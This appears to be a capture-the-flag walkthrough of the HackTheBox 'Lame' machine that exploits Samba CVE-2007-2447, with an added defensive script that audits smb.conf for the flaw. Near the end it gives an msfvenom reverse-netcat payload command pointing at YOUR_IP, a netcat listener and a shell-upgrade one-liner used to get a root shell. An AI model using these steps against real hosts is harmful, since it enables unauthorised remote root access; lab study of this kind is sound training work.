Hackthebox LAME Walkthrough (NO Metasploit) OSCP Prep.
Box Details
OS: Linux
Exploitable service: SMB
Difficulty: Easy
Estimated time: 45 minutes
1. Run NMAP scan to detect open ports
Start with a standard scan (the default port range).
This scan shows four open ports and the service running on each:
Port 21 FTP: vsftpd 2.3.4 (a vulnerable version, but a rabbit hole here)
Port 22 SSH: OpenSSH 4.7p1 (from experience, SSH is hardly ever exploitable except through brute force or username enumeration)
Port 139: NetBIOS/Samba, which always works together with port 445
Port 445 SMB: smbd 3.0.20-Debian (vulnerable)
2. Run an Nmap scan to check all ports
A look shows there is an additional port, 3632, with a distccd service running; I tried enumerating it via netcat and the web but got no results, so I assumed it was a rabbit hole.
The real enumeration
FTP
First I checked whether I could gain anonymous access via FTP.
I successfully gained anonymous access via FTP and tried listing the contents of the FTP directory, but it seemed empty.
I tried uploading files via the PUT command, but it failed.
But remember, this is a vulnerable FTP version.
So I searched for public exploits on GitHub (I'm a fan of using already modified or tried-and-tested scripts from GitHub, though it's a bad idea, as you should get your exploits from trustworthy sources like exploitdb.com).
I tried some of the exploits there, but they didn't work, so I figured a patch must have been applied to the FTP application.
SMB Enumeration
SMB is a highly vulnerable service, and I had a feeling that the initial compromise of this box had to be through it. The version was already known to be vulnerable to CVE-2007-2447 (the Samba "username map script" command injection).
So I knew this was the way into the box.
I tried enumerating via Nmap NSE scripts but didn't get any results.
I tried enumerating shares with smbclient but got no results either.
It was time to explore the Samba username map script exploit.
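As an added defender-side example (my own code, not from the post or the linked exploit), this Python script audits a Samba banner and an smb.conf for the CVE-2007-2447 exposure: a 3.0.x release before the 3.0.25 fix combined with the "username map script" directive, which on those versions passes the supplied username to a shell unsanitized. The banner and config below are constructed samples, and the smb.conf parser is a deliberately minimal one.

```python
"""Audit a Samba banner and smb.conf for CVE-2007-2447 ('username map script') exposure.
Added example, not from the original post. Assumes an ini-style smb.conf and a banner
formatted like the one Nmap reports (e.g. 'smbd 3.0.20-Debian')."""
import re

# CVE-2007-2447 affects Samba 3.0.0 up to (but not including) the 3.0.25 fix.
FIRST_AFFECTED = (3, 0, 0)
FIXED_VERSION = (3, 0, 25)

def parse_version(banner: str):
    """Extract (major, minor, patch) from a banner; None if no version is present."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def parse_smb_conf(text: str):
    """Minimal smb.conf parser -> {section: {key: value}}; keys are lower-cased and
    whitespace-normalised. Lines starting with ';' or '#' are comments (Samba style)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def audit(banner: str, conf_text: str):
    """Return a list of findings; an empty list means no CVE-2007-2447 exposure was seen."""
    findings = []
    version = parse_version(banner)
    if version is not None and FIRST_AFFECTED <= version < FIXED_VERSION:
        findings.append("Samba %s predates the 3.0.25 fix for CVE-2007-2447" % ".".join(map(str, version)))
    script = parse_smb_conf(conf_text).get("global", {}).get("username map script")
    if script:
        findings.append("'username map script = %s' is set: on affected versions the "
                        "client-supplied username reaches the shell unsanitized" % script)
    return findings

# Constructed sample: the banner seen on the box plus a config that enables the hook.
SAMPLE_BANNER = "smbd 3.0.20-Debian"
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   ; mapping hook: the injection point on affected versions
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_BANNER, SAMPLE_CONF):
        print("FINDING:", finding)
```

Removing the directive, or upgrading past 3.0.25, clears both findings; the script is meant for a config review, not for scanning hosts.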
So I used an exploit by macha97, a simple Python script that involves generating your own shellcode with msfvenom and swapping it in: https://github.com/macha97/exploit-smb-3.0.20
All you have to do is generate your shellcode with the msfvenom command:
#msfvenom -p cmd/unix/reverse_netcat LHOST=YOUR_IP LPORT=PORT -f python
Replace the shellcode in the exploit with the one you generated. Depending on your Python version you might have some issues, but try using python3.
Set up your netcat listener on your port (nc -lvnp PORT).
Run the exploit and you automatically get a root shell.
You can upgrade your shell with python -c 'import pty; pty.spawn("/bin/bash")'
and enumerate to find user.txt and root.txt.
Privilege escalation was not necessary, as the shell was already a root shell.
Thanks for Reading.